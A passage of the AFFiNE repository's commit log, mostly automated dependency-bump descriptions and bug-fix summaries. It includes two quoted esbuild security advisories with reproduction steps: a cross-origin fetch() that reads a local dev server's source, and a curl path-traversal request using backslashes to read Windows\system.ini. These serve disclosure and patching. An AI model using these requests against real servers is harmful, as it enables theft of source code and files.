malicious web page. 1. The attacker sends a `fetch('http://127.0.0.1:8000/main.js')` request by JS in that malicious web page. This request is normally blocked by same-origin policy, but that's not the case for the reasons above. 1. The attacker gets the content of `http://127.0.0.1:8000/main.js`. In this scenario, I assumed that the attacker knows the URL of the bundle output file name. But the attacker can also get that information by - Fetching `/index.html`: normally you have a script tag here - Fetching `/assets`: it's common to have a `assets` directory when you have JS files and CSS files in a different directory and the directory listing feature tells the attacker the list of files - Connecting `/esbuild` SSE endpoint: the SSE endpoint sends the URL path of the changed files when the file is changed (`new EventSource('/esbuild').addEventListener('change', e => console.log(e.type, e.data))`) - Fetching URLs in the known file: once the attacker knows one file, the attacker can know the URLs imported from that file The scenario above fetches the compiled content, but if the victim has the source map option enabled, the attacker can also get the non-compiled content by fetching the source map file. ##### PoC 1. Download [reproduction.zip](https://redirect.github.com/user-attachments/files/18561484/reproduction.zip) 2. Extract it and move to that directory 1. Run `npm i` 1. Run `npm run watch` 1. Run `fetch('http://127.0.0.1:8000/app.js').then(r => r.text()).then(content => console.log(content))` in a different website's dev tools.  ##### Impact Users using the serve feature may get the source code stolen by malicious websites. #### Severity - CVSS Score: 5.3 / 10 (Medium) - Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N` #### References - [https://github.com/evanw/esbuild/security/advisories/GHSA-67mh-4wv8-2f99](https://redirect.github.com/evanw/esbuild/security/advisories/GHSA-67mh-4wv8-2f99) - [https://github.com/evanw/esbuild/commit/de85afd65edec9ebc44a11e245fd9e9a2e99760d](https://redirect.github.com/evanw/esbuild/commit/de85afd65edec9ebc44a11e245fd9e9a2e99760d) - [https://github.com/advisories/GHSA-67mh-4wv8-2f99](https://redirect.github.com/advisories/GHSA-67mh-4wv8-2f99) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-67mh-4wv8-2f99) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### esbuild allows arbitrary file read when running the development server on Windows [GHSA-g7r4-m6w7-qqqr](https://redirect.github.com/advisories/GHSA-g7r4-m6w7-qqqr) <details> <summary>More information</summary> #### Details ##### Summary The development server contains a path traversal vulnerability on Windows when serving files from `servedir`. Due to the use of `path.Clean()` (which only normalizes forward-slash `/` separators) instead of a Windows-aware path normalization function, it is possible to craft requests using backslashes (`\`) that bypass the intended directory containment logic. An attacker can escape the configured `servedir` root and access arbitrary files on the filesystem. This issue affects Windows environments only. ##### Details The request path is sanitized using: ```go // https://github.com/evanw/esbuild/blob/v0.27.3/pkg/api/serve_other.go#L165 queryPath := path.Clean(req.URL.Path)[1:] ``` However: - `path.Clean()` is POSIX-style and only understands `/` (docs: `https://pkg.go.dev/path#Clean`) - On Windows, `\` is a valid path separator - `path.Clean()` does not treat `\` as a separator Later, the server constructs the absolute path: ```go // https://github.com/evanw/esbuild/blob/v0.27.3/pkg/api/serve_other.go#L221 absPath := h.fs.Join(h.servedir, queryPath) ``` If `queryPath` contains sequences such as: ``` ..\..\..\..\..\..\..\Windows\system.ini ``` `path.Clean()` will not normalize them, but the Windows filesystem will interpret `\` as directory separators when resolving `absPath`. Because the implementation does not verify that the final resolved path remains within `servedir`, it allows directory traversal outside the intended root directory. ##### Vulnerable Code ```go // https://github.com/evanw/esbuild/blob/v0.27.3/pkg/api/serve_other.go#L165 queryPath := path.Clean(req.URL.Path)[1:] .... // Check for a file in the "servedir" directory if h.servedir != "" && kind != fs.FileEntry { absPath := h.fs.Join(h.servedir, queryPath) if absDir := h.fs.Dir(absPath); absDir != absPath { if entries, err, _ := h.fs.ReadDirectory(absDir); err == nil { if entry, _ := entries.Get(h.fs.Base(absPath)); entry != nil && entry.Kind(h.fs) == fs.FileEntry { .... ``` ##### Steps to reproduce ``` npm install --save-exact --save-dev esbuild echo "console.log(1)" > app.js .\node_modules\.bin\esbuild --version 0.27.3 .\node_modules\.bin\esbuild app.js --bundle --outdir=www --servedir=www --watch curl -i --path-as-is "http://localhost:8000/..\..\..\..\..\..\..\Windows\system.ini" <content of Windows\system.ini> ``` ##### Impact - Arbitrary file read on Windows - Exposure of sensitive files #### Severity - CVSS Score: 2.5 / 10 (Low) - Vector String: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N` #### References - [https://github.com/evanw/esbuild/security/advisories/GHSA-g7r4-m6w7-qqqr](https://redirect.github.com/evanw/esbuild/security/advisories/GHSA-g7r4-m6w7-qqqr) - [https://github.com/evanw/esbuild/releases/tag/v0.28.1](https://redirect.github.com/evanw/esbuild/releases/tag/v0.28.1) - [https://github.com/advisories/GHSA-g7r4-m6w7-qqqr](https://redirect.github.com/advisories/GHSA-g7r4-m6w7-qqqr) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-g7r4-m6w7-qqqr) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Release Notes <details> <summary>evanw/esbuild (esbuild)</summary> ### [`v0.28.1`](https://redirect.github.com/evanw/esbuild/blob/HEAD/CHANGELOG.md#0281) [Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.28.0...v0.28.1) - Disallow `\\` in local development server HTTP requests ([GHSA-g7r4-m6w7-qqqr](https://redirect.github.com/evanw/esbuild/security/advisories/GHSA-g7r4-m6w7-qqqr)) This release fixes a security issue where HTTP requests to esbuild's local development server could traverse outside of the serve directory on Windows using a `\\` backslash character. It happened due to the use of Go's `path.Clean()` function, which only handles Unix-style `/` characters. HTTP requests with paths containing `\\` are no longer allowed. Thanks to [@​dellalibera](https://redirect.github.com/dellalibera) for reporting this issue. - Add integrity checks to the Deno API ([GHSA-gv7w-rqvm-qjhr](https://redirect.github.com/evanw/esbuild/security/advisories/GHSA-gv7w-rqvm-qjhr)) The previous release of esbuild added integrity checks to esbuild's npm install script. This release also adds integrity checks to esbuild's Deno install script. Now esbuild's Deno API will also fail with an error if the downloaded esbuild binary contains something other than the expected content. Note that esbuild's Deno API installs from `registry.npmjs.org` by default, but allows the `NPM_CONFIG_REGISTRY` environment variable to override this with a custom package registry. This change means that the esbuild executable served by `NPM_CONFIG_REGISTRY` must now match the expected content. Thanks to [@​sondt99](https://redirect.github.com/sondt99) for reporting this issue. - Avoid inlining `using` and `await using` declarations ([#​4482](https://redirect.github.com/evanw/esbuild/issues/4482)) Previously esbuild's minifier sometimes incorrectly inlined `using` and `await using` declarations into subsequent uses of that declaration, which then fails to dispose of the resource correctly. This bug happened because inlining was done for `let` and `const` declarations by avoiding doing it for `var` declarations, which no longer worked when more declaration types were added. Here's an example: ```js // Original code { using x = new Resource() x.activate() } // Old output (with --minify) new Resource().activate(); // New output (with --minify) {using e=new Resource;e.activate()} ``` - Fix module evaluation when an error is thrown ([#​4461](https://redirect.github.com/evanw/esbuild/issues/4461), [#​4467](https://redirect.github.com/evanw/esbuild/pull/4467)) If an error is thrown during module evaluation, esbuild previously didn't preserve the state of the module for subsequent module references. This was observable if `import()` or `require()` is used to import a module multiple times. The thrown error is supposed to be thrown by every call to `import()` or `require()`, not just the first. With this release, esbuild will now throw the same error every time you call `import()` or `require()` on a module that throws during its evaluation. - Fix some edge cases around the `new` operator ([#​4477](https://redirect.github.com/evanw/esbuild/issues/4477)) Previously esbuild incorrectly printed certain edge cases involving complex expressions inside the target of a `new` expression (specifically an optional chain and/or a tagged template literal). The generated code for the `new` target was not correctly wrapped with parentheses, and either contained a syntax error or had different semantics. These edge cases have been fixed so that they now correctly wrap the `new` target in parentheses. Here is an example of some affected code: ```js // Original code new (foo()`bar`)() new (foo()?.bar)() // Old output new foo()`bar`(); new (foo())?.bar(); // New output new (foo())`bar`(); new (foo()?.bar)(); ``` - Fix renaming of nested `var` declarations ([#​4471](https://redirect.github.com/evanw/esbuild/issues/4471)) This release fixes a bug where `var` declarations in nested scopes that are hoisted up to module scope were not correctly being renamed during bundling. That could previously lead to name collisions when minification was disabled, which could potentially cause a behavior change. The bug has been fixed so that these hoisted declarations are now considered to be module-level symbols during the name collision avoidance pass. - Emit `var` instead of `const` for certain TypeScript-only constructs for ES5 ([#​4448](https://redirect.github.com/evanw/esbuild/issues/4448)) While esbuild doesn't generally support converting `const` to `var` for ES5 due to nested scoping rules (which is currently a build-time error), esbuild previously incorrectly converted TypeScript-only `import` assignment constructs into a `const` declaration even when targeting ES5. With this release, esbuild will now use `var` for this case instead: ```js // Original code import x = require('y') // Old output (with --target=es5) const x = require("y"); // New output (with --target=es5) var x = require("y"); ``` ### [`v0.28.0`]() [Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.7...v0.28.0) ### [`v0.27.7`]() [Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.5...v0.27.7) ### [`v0.27.5`]() [Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.4...v0.27.5) ### [`v0.27.4`]() [Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.3...v0.27.4) ### [`v0.27.3`]() [Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.2...v0.27.3) ### [`v0.27.2`]() [Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.1...v0.27.2) ### [`v0.27.1`]() [Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.0...v0.27.1) ### [`v0.27.0`]() [Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.26.0...v0.27.0) ### [`v0.26.0`]() [Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.25.12...v0.26.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMTkuMCIsInVwZGF0ZWRJblZlciI6IjQzLjIxOS4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>v2026.6.18-canary.1034 |
||
|
|
154d9e975d | fix: deps & config (#15126) | ||
|
|
24e07f73bb |
chore: bump up capacitor-plugin-app-tracking-transparency version to v3 (#15079)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [capacitor-plugin-app-tracking-transparency](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency) | [`^2.0.5` → `^3.0.0`](https://renovatebot.com/diffs/npm/capacitor-plugin-app-tracking-transparency/2.0.5/3.0.0) |  |  | --- ### Release Notes <details> <summary>mahnuh/capacitor-plugin-app-tracking-transparency (capacitor-plugin-app-tracking-transparency)</summary> ### [`v3.0.0`](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/releases/tag/v3.0.0) [Compare Source](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/compare/v2.0.5...v3.0.0) - Add support for Swift Package Manager ([#​29](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/issues/29)) [`40051d6`](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/commit/40051d6) - Update README.md [`d8c4d27`](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/commit/d8c4d27) *** </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMDkuNCIsInVwZGF0ZWRJblZlciI6IjQzLjIwOS40IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com> |
||
|
|
d500e472f0 | chore: bump deps (#15124) | ||
|
|
13d9fe506e |
feat(native): cleanup vendored deps (#15119)
#### PR Dependency Tree * **PR #15119** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Breaking Changes** * Removed major Rust public APIs related to document/CRDT encoding, synchronization, and document loading from the affected packages. * **Chores** * Migrated internal dependency usage to published crates and trimmed the Rust workspace/feature surface. * **CI/CD** * Simplified the Rust CI pipeline by removing advanced testing jobs and updating job dependencies. * **Dev/Test/Bench** * Removed associated benchmark and fuzzing artifacts and related fixture/test utilities. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
1256d66938 |
fix(server): sync permission check (#15123)
fix #15121 #### PR Dependency Tree * **PR #15123** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Security Improvements** * Enforced document-level `Doc.Read`/`Doc.Update` checks for key sync websocket operations, including filtering workspace doc timestamp results to only readable documents. * Improved remote permission handling: once a remote denies access, syncing stops for the affected document and retry behavior is suppressed. * **Improvements** * `delete-doc` now relies on server acknowledgment and returns an explicit `{ success: true }`. * Websocket acknowledgment errors are now normalized for consistent error details. * **Tests** * Expanded permission-denied and websocket error-handling coverage, including timestamp filtering and no-retry behavior after permission denial. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
da7781a751 |
feat(mobile): improve android edgeless & ci (#15118)
#### PR Dependency Tree * **PR #15118** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Chores** * Improved mobile CI workflow with change-aware Android/iOS build jobs and updated completion dependencies so tests wait for the relevant mobile builds. * **Performance / App Behavior** * Enhanced Android WebView behavior: improved viewport/WebView tuning, disabled zoom and scrollbars, and made mixed-content allowance environment-aware (debug vs non-debug). * Adjusted Android cleartext traffic handling based on build/debug settings and Capacitor server URL configuration. * **Tests** * Strengthened Electron BYOK storage tests with per-test temporary directories, mock control, and added coverage for when secure storage is unavailable. <!-- end of auto-generated comment: release notes by coderabbit.ai -->v2026.6.17-canary.1033 |
||
|
|
a77d89bb1a |
fix(editor): edgeless can't slider with finger (#15091)
fix bug edgeless can't slider with finger <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Added mobile immersive edgeless mode with dynamic chrome auto-hide and tap-gesture controls. * Added a mobile zoom ruler UI for edgeless. * **Bug Fixes** * Improved iOS rendering/zoom by applying low-zoom survival behavior, gesture-aware refresh deferral, and effective-DPR canvas scaling. * Fixed iOS webview zoom/bounce and process-termination reload behavior. * Improved placeholder styling with theme-aware colors. * **Chores** * Updated local ignore rules and iOS app build/version configuration. <!-- end of auto-generated comment: release notes by coderabbit.ai --> --------- Co-authored-by: DarkSky <darksky2048@gmail.com> |
||
|
|
c51bdb74de |
fix: resolve renovate configuration validation error (#15104)
Fixes #15101 ### What this PR does Resolves a Renovate configuration error where the bot stopped processing PRs due to invalid settings in `.github/renovate.json`. ### The Bug The 4th rule in the `packageRules` array was combining the `*` wildcard with negated regex patterns (`!/^@blocksuite//`, `!/oxlint/`) inside the `matchPackageNames` field, which violates Renovate's current validation schema. ### The Fix * Kept the `*` wildcard isolated inside `matchPackageNames`. * Extracted the negative lookaheads and moved them to their dedicated `excludePackagePatterns` array. * Cleaned up the regex formatting for the exclusion patterns. *Note: This configuration was successfully verified locally using `npx renovate-config-validator`.* <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Chores** * Refined dependency update configuration: broadened the non-major npm package rule to apply to all packages while explicitly excluding selected packages from automated updates. * Adjusted exclusion patterns to replace prior negation-based logic with clearer exclusion entries for specific packages. <!-- end of auto-generated comment: release notes by coderabbit.ai -->v2026.6.15-canary.1103 |
||
|
|
ac3c93ccfa |
fix(editor): render strikethrough on links (#15109)
**Issue** Strikethrough on a link doesn't render. The toolbar button highlights but no line appears (#15106). **Solution** affine-link hardcoded text-decoration: none in the override it passes to affineTextStyles, which clobbered the decoration computed from strike/underline. Removing it fixes the render; plain links still show no underline because affineTextStyles returns none by default. **Result** Strikethrough and underline render on links again. Added an e2e test: a plain link stays undecorated, a struck link renders line-through, red before the fix and green after. fix #15106 <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Bug Fixes** * Fixed link text-decoration styling to properly support strikethrough and other text formatting when applied to links. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
6a2b73e76f |
feat(editor): improve database & table behavior (#15100)
fix #14982 fix #15028 fix #15099 #### PR Dependency Tree * **PR #15100** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Bug Fixes** * Prevented Enter handling during IME composition to avoid unintended input. * Avoided overwriting external native selections when interacting with tables. * Improved validation of inline text selection ranges for more reliable behavior. * **Enhancements** * Scoped and refined text-selection styling and editability within tables and cells. * Added managed sorting for Kanban views to control card ordering. <!-- end of auto-generated comment: release notes by coderabbit.ai -->v2026.6.11-canary.1031 |
||
|
|
07a08e6d4d |
fix(editor): import & save logic (#15098)
fix #15080 fix #15085 fix #15031 fix #15094 #### PR Dependency Tree * **PR #15098** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Bug Fixes** * Improved code-block paste behavior for plain-text insertion * Fixed block selection ordering to reflect document model * Made table cell formatting resilient to conversion errors * Ensured user feature list is consistently returned as an array * **Refactor** * Streamlined authentication session fetch and profile enrichment flow * **Tests** * Added tests for markdown blockquote list preservation * Added authentication session validation tests <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
6faebcabd3 |
fix(editor): prevent backspace in icon picker search from deleting editor content (#15089)
## Problem
When the callout block's icon picker is open and the user types in the
search input, pressing backspace deletes content in the main editor
instead of the search text.
## Root Cause
The callout icon picker is mounted via `createPopup` inside
`editor-host`. `PageKeyboardManager` registers a global `Backspace`
handler on the editor host (`keyboard-manager.ts`) with `{ global: true
}`, which fires on every backspace keydown regardless of what element is
focused. Without `stopPropagation`, the backspace event from the search
input bubbles up through the DOM and triggers block deletion.
Other keys are unaffected because the editor handles character input
through `contenteditable` focus, those handlers only act when a
contenteditable node is active.
## Fix
Add `onKeyDown` with `e.stopPropagation()` to the search inputs in both
`EmojiPicker` and `AffineIconPicker`. This matches the existing pattern
already used by `MenuComponent` (`menu-renderer.ts:107`) and all other
interactive components (`date-picker`, `inline-edit`, `prompt-modal`).
## Why not affected elsewhere
`DocIconPicker` uses the same pickers but wraps them in a Radix UI
`Menu` with `modal: true`, which portals outside `editor-host` — so
backspace events never reach the editor's global handler there.
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **Bug Fixes**
* Improved keyboard event handling in search inputs for icon and emoji
pickers
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
v2026.6.10-canary.1025
|
||
|
|
d10dd12663 |
fix(core): transport may not available (#15087)
fix #15086 #### PR Dependency Tree * **PR #15087** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Bug Fixes** * Console logging is now disabled in production builds to reduce unnecessary log output, while remaining enabled in development for debugging purposes. <!-- end of auto-generated comment: release notes by coderabbit.ai -->v2026.6.7-canary.1000 |
||
|
|
edc87e38df |
chore: bump up RevenueCat/purchases-ios-spm version to from: "5.76.0" (#15077)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [RevenueCat/purchases-ios-spm](https://redirect.github.com/RevenueCat/purchases-ios-spm) | minor | `from: "5.75.0"` → `from: "5.76.0"` | --- ### Release Notes <details> <summary>RevenueCat/purchases-ios-spm (RevenueCat/purchases-ios-spm)</summary> ### [`v5.76.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.75.0...5.76.0) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.75.0...5.76.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMDkuNCIsInVwZGF0ZWRJblZlciI6IjQzLjIwOS40IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>v2026.6.4-canary.1018 |
||
|
|
65c3271beb |
feat(server): clean up dirty data from legacy version (#15078)
#### PR Dependency Tree * **PR #15078** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Persist and replay incoming payment webhooks for reliability. * Track provider-level subscriptions, payment events, and per-target trial usage across providers. * Nightly replay job to reprocess stuck payment events. * Shadow backfill mode and emit-suppression options to control projection/backfill side effects. * Subscriptions now derived from entitlements + provider facts. * **Bug Fixes** * Improved error propagation, retry tracking, and safer owner-grant projection handling. * **Tests** * Added webhook failure/replay, provider integration, entitlement projection, and trial/checkout tests. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
489702eb66 |
chore: bump up actions/github-script action to v9 (#15074)
This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [actions/github-script](https://redirect.github.com/actions/github-script) | action | major | `v8` → `v9` | --- ### Release Notes <details> <summary>actions/github-script (actions/github-script)</summary> ### [`v9.0.0`](https://redirect.github.com/actions/github-script/releases/tag/v9.0.0) [Compare Source](https://redirect.github.com/actions/github-script/compare/v9.0.0...v9.0.0) **New features:** - **`getOctokit` factory function** — Available directly in the script context. Create additional authenticated Octokit clients with different tokens for multi-token workflows, GitHub App tokens, and cross-org access. See [Creating additional clients with `getOctokit`](https://redirect.github.com/actions/github-script#creating-additional-clients-with-getoctokit) for details and examples. - **Orchestration ID in user-agent** — The `ACTIONS_ORCHESTRATION_ID` environment variable is automatically appended to the user-agent string for request tracing. **Breaking changes:** - **`require('@​actions/github')` no longer works in scripts.** The upgrade to `@actions/github` v9 (ESM-only) means `require('@​actions/github')` will fail at runtime. If you previously used patterns like `const { getOctokit } = require('@​actions/github')` to create secondary clients, use the new injected `getOctokit` function instead — it's available directly in the script context with no imports needed. - `getOctokit` is now an injected function parameter. Scripts that declare `const getOctokit = ...` or `let getOctokit = ...` will get a `SyntaxError` because JavaScript does not allow `const`/`let` redeclaration of function parameters. Use the injected `getOctokit` directly, or use `var getOctokit = ...` if you need to redeclare it. - If your script accesses other `@actions/github` internals beyond the standard `github`/`octokit` client, you may need to update those references for v9 compatibility. ##### What's Changed - Add ACTIONS\_ORCHESTRATION\_ID to user-agent string by [@​Copilot](https://redirect.github.com/Copilot) in [#​695](https://redirect.github.com/actions/github-script/pull/695) - ci: use deployment: false for integration test environments by [@​salmanmkc](https://redirect.github.com/salmanmkc) in [#​712](https://redirect.github.com/actions/github-script/pull/712) - feat!: add getOctokit to script context, upgrade [@​actions/github](https://redirect.github.com/actions/github) v9, [@​octokit/core](https://redirect.github.com/octokit/core) v7, and related packages by [@​salmanmkc](https://redirect.github.com/salmanmkc) in [#​700](https://redirect.github.com/actions/github-script/pull/700) ##### New Contributors - [@​Copilot](https://redirect.github.com/Copilot) made their first contribution in [#​695](https://redirect.github.com/actions/github-script/pull/695) **Full Changelog**: <https://github.com/actions/github-script/compare/v8.0.0...v9.0.0> ### [`v9`](https://redirect.github.com/actions/github-script/compare/v8...v9) [Compare Source](https://redirect.github.com/actions/github-script/compare/v8.0.0...v9.0.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMDkuMCIsInVwZGF0ZWRJblZlciI6IjQzLjIwOS4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
e3349b458c |
chore: bump up apple-actions/import-codesign-certs action to v7 (#15075)
This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [apple-actions/import-codesign-certs](https://redirect.github.com/apple-actions/import-codesign-certs) | action | major | `v6` → `v7` | --- ### Release Notes <details> <summary>apple-actions/import-codesign-certs (apple-actions/import-codesign-certs)</summary> ### [`v7.0.0`](https://redirect.github.com/Apple-Actions/import-codesign-certs/releases/tag/v7.0.0) [Compare Source](https://redirect.github.com/apple-actions/import-codesign-certs/compare/v7.0.0...v7.0.0) #### What's Changed - Switch from `ncc` to `esbuild` - Bump flatted from 3.4.1 to 3.4.2 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [Apple-Actions#166](https://redirect.github.com/Apple-Actions/import-codesign-certs/pull/166) - Bump actions/setup-node from 6.2.0 to 6.3.0 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [Apple-Actions#167](https://redirect.github.com/Apple-Actions/import-codesign-certs/pull/167) - Bump picomatch from 2.3.1 to 2.3.2 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [Apple-Actions#168](https://redirect.github.com/Apple-Actions/import-codesign-certs/pull/168) - Bump knip from 5.78.0 to 6.2.0 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [Apple-Actions#173](https://redirect.github.com/Apple-Actions/import-codesign-certs/pull/173) **Full Changelog**: <https://github.com/Apple-Actions/import-codesign-certs/compare/v6.1.0...v7.0.0> ### [`v7`](https://redirect.github.com/apple-actions/import-codesign-certs/compare/v6.1.0...v7.0.0) [Compare Source](https://redirect.github.com/apple-actions/import-codesign-certs/compare/v6.1.0...v7.0.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMDkuMCIsInVwZGF0ZWRJblZlciI6IjQzLjIwOS4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>v2026.6.3-canary.1038 |
||
|
|
eb32a5894e |
chore: bump up @googleapis/androidpublisher version to v36 (#15063)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@googleapis/androidpublisher](https://redirect.github.com/googleapis/google-api-nodejs-client) | [`^35.0.0` → `^36.0.0`](https://renovatebot.com/diffs/npm/@googleapis%2fandroidpublisher/35.1.1/36.0.0) |  |  | --- ### Release Notes <details> <summary>googleapis/google-api-nodejs-client (@​googleapis/androidpublisher)</summary> ### [`v36.0.0`](https://redirect.github.com/googleapis/google-api-nodejs-client/blob/HEAD/CHANGELOG.md#13600-2024-05-02) ##### ⚠ BREAKING CHANGES - **workloadmanager:** This release has breaking changes. - **serviceusage:** This release has breaking changes. - **servicenetworking:** This release has breaking changes. - **serviceconsumermanagement:** This release has breaking changes. - **securitycenter:** This release has breaking changes. - **redis:** This release has breaking changes. - **networkmanagement:** This release has breaking changes. - **iam:** This release has breaking changes. - **doubleclickbidmanager:** This release has breaking changes. - **dns:** This release has breaking changes. - **dataportability:** This release has breaking changes. - **dataplex:** 